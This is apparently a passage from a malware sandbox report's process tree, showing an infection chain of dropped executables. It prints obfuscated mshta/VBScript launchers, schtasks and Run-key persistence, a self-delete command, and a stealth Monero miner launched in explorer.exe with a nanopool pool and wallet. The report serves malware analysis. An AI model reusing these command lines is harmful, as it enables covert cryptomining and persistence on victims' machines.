                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:1236
                                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:1092
                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                PID:1028
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\wujrise
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\wujrise
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:6716
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 564
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:6616
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\drjrise
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\drjrise
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    PID:1900
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\drjrise
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\drjrise
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    PID:4332
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\drjrise
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\drjrise
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:6256
                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:348
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01b537da2e0af175a.exe
                                                                                                                                                                                                                                                      Sat01b537da2e0af175a.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:688
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:3944
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:3068
                                                                                                                                                                                                                                                            • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:3500
                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:6584
                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:5888
                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                    "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:5736
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:6864
                                                                                                                                                                                                                                                                          • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                            PID:6932
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                PID:5712
                                                                                                                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                    PID:6988
                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                    PID:1300
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                          PID:688
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\4442243.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\4442243.exe"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:4104
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\403630.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\403630.exe"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            PID:5060
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3942736.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3942736.exe"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:4500
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\8550286.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\8550286.exe"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:3744
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ( "C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\Users\Admin\AppData\Roaming\8550286.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu & If """" == """" for %d in ( ""C:\Users\Admin\AppData\Roaming\8550286.exe"") do taskkill /im ""%~nXd"" -F " , 0 , TrUe ) )
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:5844
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\Users\Admin\AppData\Roaming\8550286.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu & If "" == "" for %d in ( "C:\Users\Admin\AppData\Roaming\8550286.exe") do taskkill /im "%~nXd" -F
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:5556
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                      taskkill /im "8550286.exe" -F
                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                      PID:5976
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\2285732.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\2285732.exe"
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                PID:2488
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  PID:3708
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              PID:1852
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                              PID:4168
                                                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 4168 -s 1616
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                PID:6064
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                              PID:1372
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW01.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:6864
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                    taskkill /im Soft1WW01.exe /f
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                    PID:6328
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                    PID:6680
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                PID:4280
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4516
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:4952
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:4640
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 792
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                      PID:4792
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 804
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                      PID:5560
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 772
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                      PID:6044
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 812
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                      PID:1196
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 928
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                      PID:6136
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:4776
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                    PID:4916
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:4864
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                          PID:6280
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff84ac7dec0,0x7ff84ac7ded0,0x7ff84ac7dee0
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:1424
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --mojo-platform-channel-handle=1696 /prefetch:8
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:6612
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1648 /prefetch:2
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:1160
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --mojo-platform-channel-handle=2212 /prefetch:8
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:2208
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2632 /prefetch:1
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:5728
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2624 /prefetch:1
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:6248
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3252 /prefetch:2
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:5520
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --mojo-platform-channel-handle=3232 /prefetch:8
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:5244
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --mojo-platform-channel-handle=3824 /prefetch:8
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:4824
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --mojo-platform-channel-handle=3892 /prefetch:8
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                              PID:2744
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --mojo-platform-channel-handle=1744 /prefetch:8
                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                PID:4392
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --mojo-platform-channel-handle=3260 /prefetch:8
                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                  PID:5220
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --mojo-platform-channel-handle=3140 /prefetch:8
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                    PID:6920
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,2228921920656438703,16829363822265570950,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6280_346627462" --mojo-platform-channel-handle=2912 /prefetch:8
                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                      PID:1816
